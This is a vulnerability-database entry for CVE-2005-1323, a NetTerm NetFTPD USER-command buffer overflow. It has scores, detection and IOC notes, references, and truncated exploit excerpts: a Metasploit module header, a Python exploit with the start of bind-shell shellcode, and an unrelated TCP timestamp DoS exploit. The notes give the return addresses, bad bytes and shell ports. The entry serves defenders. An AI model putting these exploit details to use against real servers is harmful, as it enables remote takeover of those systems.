CVE-2005-1323
Published 2005-05-02

CVE-2005-1323: Buffer overflow in NetFtpd for NetTerm 5.1.1 and earlier allows remote attackers to execute arbitrary code via a long USER command.

Priority: P3 (51) · Severity: high · CVSS 2.0 base score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Exploit: public exploit available
EPSS: 63.07% (99.1th percentile)
Affected (1 range)

| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| intersoft | netterm | — | — |
Detection & IOCs (extracted from sources)

Bad bytes: \x00\x0a\x20\x0d

- Detect exploitation attempts by monitoring FTP traffic for oversized USER commands (buffer size ~1014 bytes or larger) sent to NetTerm NetFTPD.
- Check the FTP banner for the 'NetTerm FTP server' string to identify vulnerable instances; the Metasploit module uses this banner check to confirm vulnerability.
- After successful exploitation, watch for unexpected TCP connections on port 4444 associated with the FTP server process (netftpd.exe): inbound for a bind shell, outbound for a reverse shell.
- The exploit payload uses a stack adjustment of -3500 bytes; anomalous stack pointer manipulation in netftpd.exe may indicate exploitation.
- The universal return address (0x0040df98) targets netftpd.exe directly and applies across multiple versions; other return addresses are DLL-specific to particular Windows OS versions.
- The exploit payload space is limited to 1000 bytes and must avoid the bad characters \x00, \x0a, \x20, \x0d; shellcode must be encoded accordingly.
No detection rules found.
Exploit-DB

NetTerm NetFTPD - 'USER' Remote Buffer Overflow (Metasploit) (exploitdb · 2010-10-05 · CVE-2005-1323)

```ruby
##
# $Id: netterm_netftpd_user.rb 10559 2010-10-05 23:41:17Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 'NetTerm NetFTPD USER Buffer Overflow',
      'Description'    => %q{
          This module exploits a vulnerability in the NetTerm NetFTPD
        application. This package is part of the NetTerm package.
        This module uses the USER command to trigger the overflow.
      },
      'Author'         => [ 'hdm' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 10559 $',
      'References'     =>
        [
          [ 'CVE', '2005-1323'],
```
Exploit-DB

TCP TIMESTAMPS - Denial of Service (exploitdb · 2005-05-21 · CVE-2005-0356)

```c
/*
 * TCP does not adequately validate segments before updating timestamp value
 * http://www.kb.cert.org/vuls/id/637934
 *
 * RFC-1323 (TCP Extensions for High Performance)
 *
 * 4.2.1 defines how the PAWS algorithm should drop packets with invalid
 * timestamp options:
 *
 * R1) If there is a Timestamps option in the arriving segment
 *     and SEG.TSval = TSrecent and SEG.SEQ th_seq, tp->last_ack_sent)) {
 *         tp->ts_recent_age = ticks;
 *         tp->ts_recent = to.to_tsval;
 *     }
 *
 * The problem here is that the packet the timestamp is accepted from doesn't
 * need to have a valid th_seq or th_ack. This point of execution is reached
 * for packets with arbitrary th_ack values and th_seq values of half the
 * possible value range, because the first 'if (todrop > tlen)' check
```
Exploit-DB

NetFTPd 4.2.2 - User Authentication Remote Buffer Overflow (exploitdb · 2005-04-26 · CVE-2005-1323)

```python
#
# Net-ftpd 4.2.2 user authentication b0f exploit (0day)
# coded by Sergio 'shadown' Alvarez
#
import struct
import socket
import sys
import time

class warftpd:
    def __init__(self, host, port):
        self.host = host
        self.port = port
        self.bsize = 512
        self.ebpaddr = 0xcacacaca
        self.retaddr = 0xdeadbeef
        self.sctype = 'findskt'
        self.scport = None

    def setebpaddr(self, addr):
        self.ebpaddr = addr

    def setretaddr(self, addr):
        self.retaddr = addr

    def setbsize(self, size):
        self.bsize = size

    def setsctype(self, type):
        self.sctype = type

    def setscport(self, port):
        self.scport = port

    def genbuffer(self):
        ##
        # Alpha port bind 4444, thanx metasploit
        ##
        sc = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
        sc += "\x49\x49\
```
Metasploit

NetTerm NetFTPD USER Buffer Overflow (metasploit)

This module exploits a vulnerability in the NetTerm NetFTPD application. This package is part of the NetTerm package. This module uses the USER command to trigger the overflow.
No writeups or analysis indexed.
References

- http://secunia.com/advisories/15140
- http://www.osvdb.org/15865
- http://www.securenetterm.com/html/what_s_new.html
- http://www.securityfocus.com/archive/1/396959
- http://www.securityfocus.com/bid/13396
- http://www.vupen.com/english/advisories/2005/0407
- https://exchange.xforce.ibmcloud.com/vulnerabilities/20285

Published: 2005-05-02